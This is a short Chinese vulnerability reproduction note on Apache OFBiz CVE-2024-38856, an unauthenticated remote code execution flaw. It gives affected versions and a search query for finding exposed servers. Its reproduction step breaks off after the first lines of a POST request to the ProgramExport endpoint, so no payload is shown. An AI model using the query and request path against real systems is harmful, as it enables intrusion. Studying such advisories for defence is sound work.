Apache-OFBiz授权不当导致RCE (CVE-2024-38856)

0x01 漏洞描述:

Apache OFBiz 18.12.14之前版本存在命令执行漏洞,该漏洞源于ControlServlet和RequestHandler函数,在处理请求中存在授权错误,导致未经身份验证的远程攻击者通过构造特殊URL来覆盖最终的渲染视图,从而执行任意代码

0x02 影响版本:

Apache OFBiz <= 18.12.14

0x03 搜索语句:

app="Apache_OFBiz"

Apache-OFBiz授权不当导致RCE (CVE-2024-38856)_第1张图片

0x04 漏洞复现:

POST /webtools/control/main/ProgramExport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWeb

你可能感兴趣的:(漏洞复现,apache)